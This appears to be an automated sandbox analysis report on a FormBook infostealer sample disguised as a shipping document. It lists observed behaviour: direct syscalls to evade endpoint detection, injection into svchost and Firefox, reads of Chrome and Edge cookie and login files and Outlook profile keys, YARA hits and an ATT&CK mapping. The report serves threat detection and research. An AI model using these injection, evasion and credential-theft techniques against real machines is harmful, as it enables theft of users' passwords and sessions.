            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E mov edx, dword ptr fs:[00000030h]1_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E mov eax, dword ptr fs:[00000030h]1_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4978 mov eax, dword ptr fs:[00000030h]1_2_032D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D4978 mov eax, dword ptr fs:[00000030h]1_2_032D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC97C mov eax, dword ptr fs:[00000030h]1_2_032BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0946 mov eax, dword ptr fs:[00000030h]1_2_032B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304940 mov eax, dword ptr fs:[00000030h]1_2_03304940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]1_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032309AD mov eax, dword ptr fs:[00000030h]1_2_032309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032309AD mov eax, dword ptr fs:[00000030h]1_2_032309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B89B3 mov esi, dword ptr fs:[00000030h]1_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B89B3 mov eax, dword ptr fs:[00000030h]1_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B89B3 mov eax, dword ptr fs:[00000030h]1_2_032B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE9E0 mov eax, dword ptr fs:[00000030h]1_2_032BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032629F9 mov eax, dword ptr fs:[00000030h]1_2_032629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032629F9 mov eax, dword ptr fs:[00000030h]1_2_032629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C69C0 mov eax, dword ptr fs:[00000030h]1_2_032C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]1_2_0323A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032649D0 mov eax, dword ptr fs:[00000030h]1_2_032649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA9D3 mov eax, dword ptr fs:[00000030h]1_2_032FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov ecx, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]1_2_03252835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A830 mov eax, dword ptr fs:[00000030h]1_2_0326A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D483A mov eax, dword ptr fs:[00000030h]1_2_032D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D483A mov eax, dword ptr fs:[00000030h]1_2_032D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC810 mov eax, dword ptr fs:[00000030h]1_2_032BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h]1_2_032BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h]1_2_032BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6870 mov eax, dword ptr fs:[00000030h]1_2_032C6870
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E581D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00E581D4
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E2A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E2A2D5
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E2A2A4 SetUnhandledExceptionFilter,0_2_00E2A2A4

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 7940Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 27F1008Jump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E58A73 LogonUserW,0_2_00E58A73
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E03B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E03B4C
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E04A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00E04A35
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E64CFA mouse_event,0_2_00E64CFA
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe"Jump to behavior
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E581D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00E581D4
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E64A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00E64A08
            Source: SHIPPING DOC MBL+HBL.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: SHIPPING DOC MBL+HBL.exe, PrWIbKXhdqUKk.exe, 00000005.00000000.2047583367.0000000001630000.00000002.00000001.00040000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000005.00000002.3566730192.0000000001630000.00000002.00000001.00040000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000008.00000002.3567038470.0000000000EA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: PrWIbKXhdqUKk.exe, 00000005.00000000.2047583367.0000000001630000.00000002.00000001.00040000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000005.00000002.3566730192.0000000001630000.00000002.00000001.00040000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000008.00000002.3567038470.0000000000EA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: PrWIbKXhdqUKk.exe, 00000005.00000000.2047583367.0000000001630000.00000002.00000001.00040000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000005.00000002.3566730192.0000000001630000.00000002.00000001.00040000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000008.00000002.3567038470.0000000000EA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: PrWIbKXhdqUKk.exe, 00000005.00000000.2047583367.0000000001630000.00000002.00000001.00040000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000005.00000002.3566730192.0000000001630000.00000002.00000001.00040000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000008.00000002.3567038470.0000000000EA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E287AB cpuid 0_2_00E287AB
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E35007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00E35007
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E4215F GetUserNameW,0_2_00E4215F
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E340BA __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00E340BA
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E04AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E04AFE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2131318736.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3566928575.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3568694635.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2129407938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3567072049.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3565538257.0000000003050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3567001047.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2132245829.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: SHIPPING DOC MBL+HBL.exeBinary or memory string: WIN_81
            Source: SHIPPING DOC MBL+HBL.exeBinary or memory string: WIN_XP
            Source: SHIPPING DOC MBL+HBL.exeBinary or memory string: WIN_XPe
            Source: SHIPPING DOC MBL+HBL.exeBinary or memory string: WIN_VISTA
            Source: SHIPPING DOC MBL+HBL.exeBinary or memory string: WIN_7
            Source: SHIPPING DOC MBL+HBL.exeBinary or memory string: WIN_8
            Source: SHIPPING DOC MBL+HBL.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2131318736.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3566928575.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3568694635.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2129407938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3567072049.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3565538257.0000000003050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3567001047.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2132245829.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E76399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00E76399
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exeCode function: 0_2_00E7685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00E7685D

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		2
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
